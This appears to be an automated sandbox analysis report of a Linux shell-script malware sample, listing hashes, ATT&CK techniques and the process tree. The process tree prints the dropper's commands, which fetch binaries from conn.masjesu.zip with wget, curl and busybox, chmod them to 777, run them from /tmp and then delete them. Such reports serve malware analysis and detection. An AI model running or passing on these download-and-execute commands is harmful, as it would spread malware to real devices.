Analysis
-
max time kernel
149s -
max time network
11s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28/10/2024, 01:45
Static task
static1
Behavioral task
behavioral1
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh
-
Size
10KB
-
MD5
cd798da264eea2cb34f14ab849c4c0e3
-
SHA1
f8107efcd9299b6364ce3648717b2ecc577cc05a
-
SHA256
68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617
-
SHA512
886db5cb7ff8566ea8507ce0cb56df8dc2dd51d8a5e7ac27a67d2a19da607232b90918a184ceb91dafc01fdecdfa552185580c40db363b5fa153849afda32cdc
-
SSDEEP
192:G3T4hJ8AQ4mPmfmympmFm8/bfTUJhdWA3T4hJFfTUJh3mPmfmympmFm8o:uAQJeO3kY8/YW9eO3kY8o
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 705 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 706 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 709 wget 712 curl 683 wget 691 curl 703 busybox -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl
Processes
-
/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh/tmp/68542373ab9f41042ce0859952b5e7466b60624a417b1da7968230cad9001617.sh1⤵PID:675
-
/bin/rm/bin/rm bins.sh2⤵PID:678
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- System Network Configuration Discovery
PID:683
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:691
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- System Network Configuration Discovery
PID:703
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:705
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:706
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:707
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- System Network Configuration Discovery
PID:709
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:712
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97